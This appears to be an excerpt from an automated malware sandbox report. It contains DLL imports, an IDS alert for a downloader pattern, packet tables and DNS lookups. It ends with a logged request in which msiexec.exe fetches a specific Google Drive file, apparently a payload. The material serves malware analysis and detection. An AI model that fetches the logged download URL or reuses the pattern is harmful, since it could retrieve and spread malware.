KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T22:46:43.879482+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49720 | 216.58.206.78 | 443 | TCP
                                                                        Mar 7, 2025 22:47:05.546948910 CET49727443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:05.547883034 CET49727443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:05.547954082 CET44349727142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:05.548027992 CET49727443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:05.669684887 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:05.669785023 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:05.669970989 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:05.670372009 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:05.670402050 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:07.711519003 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:07.711796999 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:07.712161064 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:07.712196112 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:07.712358952 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:07.712373018 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:08.587593079 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:08.587732077 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:08.587800980 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:08.587835073 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:08.587865114 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:08.587893963 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:08.587944031 CET49728443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:08.587975979 CET44349728216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:08.597511053 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:08.597552061 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:08.597625017 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:08.597887039 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:08.597903013 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:10.765549898 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:10.765676975 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:10.767607927 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:10.767625093 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:10.768667936 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:10.768748045 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:10.769067049 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:10.812325001 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.640079021 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.640199900 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.640206099 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.640252113 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.640263081 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.640321016 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.640341043 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.640394926 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.641119957 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.641194105 CET44349729142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:11.641263008 CET49729443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:11.763379097 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:11.763437033 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:11.763596058 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:11.763977051 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:11.763989925 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:14.990888119 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:14.991925955 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:14.993026018 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:14.993033886 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:14.993230104 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:14.993235111 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:15.850039959 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:15.850267887 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:15.850306034 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:15.850374937 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:15.850660086 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:15.850708008 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:15.863717079 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.863765001 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:15.863835096 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.864115953 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.864131927 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.922533035 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.922643900 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924253941 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924264908 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.924510002 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.924555063 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924832106 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.968324900 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798623085 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798672915 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798701048 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.798718929 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798733950 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.798851967 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.800327063 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.800405025 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.800498009 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.919636965 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.919701099 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:18.919835091 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.920079947 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.920089960 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.991605043 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.991771936 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993741989 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993755102 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.993876934 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993881941 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852293968 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852499962 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852529049 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852580070 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852636099 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852750063 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852811098 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.866972923 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867011070 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:21.867089033 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867311954 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867325068 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.000996113 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.001117945 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.002743959 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.002753019 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.003138065 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.003190994 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.003453970 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.044334888 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964629889 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964709997 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964724064 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964768887 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964776993 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964808941 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964827061 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964873075 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964885950 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964932919 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.965781927 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.965852976 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.965910912 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:25.107207060 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107316017 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:25.107486963 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107671976 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107698917 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.337619066 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.337707996 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.340321064 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.340396881 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.342313051 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.342333078 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.342833996 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.342895031 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.343436956 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.388323069 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293688059 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293764114 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.293776989 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293838024 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.294034004 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.294061899 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.309556007 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309602022 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:28.309664965 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309899092 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309916973 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.337565899 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.337734938 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340003967 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340020895 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.340327024 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.340399027 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340758085 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.388320923 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247251034 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247302055 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247423887 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.247442007 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247452974 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.247524023 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.248513937 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.248598099 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.248666048 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.401258945 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401329994 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:31.401449919 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401938915 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401954889 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.477806091 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.477936029 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478518963 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478535891 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.478792906 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478800058 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324826956 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324893951 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.324917078 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324963093 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.324968100 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324978113 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.325004101 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325031996 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325145006 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325158119 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.342756033 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.342863083 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:34.342977047 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.343410969 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.343442917 CET44349737142.250.185.193192.168.2.4
Mar 7, 2025 22:47:36.979727983 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:36.979839087 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:37.006742954 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:37.006803036 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:37.007091045 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:37.007164001 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:37.016324043 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:37.060347080 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:38.632225990 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:38.632287025 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:38.632365942 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:38.632405043 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:38.632422924 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:38.632457018 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:38.633047104 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:38.633135080 CET | 443 | 49737 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:38.633208036 CET | 49737 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:38.779968023 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:38.780028105 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:38.780128956 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:38.780461073 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:38.780503035 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:41.868155956 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:41.868343115 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:41.869090080 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:41.869106054 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:41.869352102 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:41.869359016 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:43.150921106 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:43.151170015 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:43.151209116 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:43.151313066 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:43.151705027 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:43.151762009 CET | 443 | 49738 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:43.151855946 CET | 49738 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:43.180906057 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:43.180969954 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:43.181066036 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:43.181359053 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:43.181375027 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:45.680160046 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:45.680322886 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:45.685225010 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:45.685237885 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:45.700654030 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:45.700751066 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:45.701637030 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:45.744321108 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:46.604269028 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:46.604351044 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:46.604505062 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:46.604505062 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:46.604551077 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:46.604619980 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:46.605168104 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:46.605211973 CET | 443 | 49739 | 142.250.185.193 | 192.168.2.4
Mar 7, 2025 22:47:46.605261087 CET | 49739 | 443 | 192.168.2.4 | 142.250.185.193
Mar 7, 2025 22:47:46.732172012 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:46.732217073 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:46.732291937 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:46.732623100 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:46.732640982 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:48.799031973 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:48.799228907 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:48.799741030 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:48.799841881 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:48.802767038 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:48.802797079 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:48.803173065 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:48.803232908 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:48.803972006 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:48.844341993 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:49.612785101 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:49.612931967 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:49.612998962 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:49.613071918 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:49.615051031 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:49.615117073 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Mar 7, 2025 22:47:49.615178108 CET | 443 | 49740 | 216.58.206.78 | 192.168.2.4
Mar 7, 2025 22:47:49.615241051 CET | 49740 | 443 | 192.168.2.4 | 216.58.206.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 22:46:40.905935049 CET | 53739 | 53 | 192.168.2.4 | 1.1.1.1
Mar 7, 2025 22:46:40.913626909 CET | 53 | 53739 | 1.1.1.1 | 192.168.2.4
Mar 7, 2025 22:46:43.904580116 CET | 54777 | 53 | 192.168.2.4 | 1.1.1.1
Mar 7, 2025 22:46:43.913497925 CET | 53 | 54777 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 22:46:40.905935049 CET | 192.168.2.4 | 1.1.1.1 | 0x16d5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:46:43.904580116 CET | 192.168.2.4 | 1.1.1.1 | 0x256d | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 7, 2025 22:46:40.913626909 CET | 1.1.1.1 | 192.168.2.4 | 0x16d5 | No error (0) | drive.google.com | | 216.58.206.78 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:46:43.913497925 CET | 1.1.1.1 | 192.168.2.4 | 0x256d | No error (0) | drive.usercontent.google.com | | 142.250.185.193 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49720 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:46:42 UTC | 216 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
2025-03-07 21:46:43 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:43 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
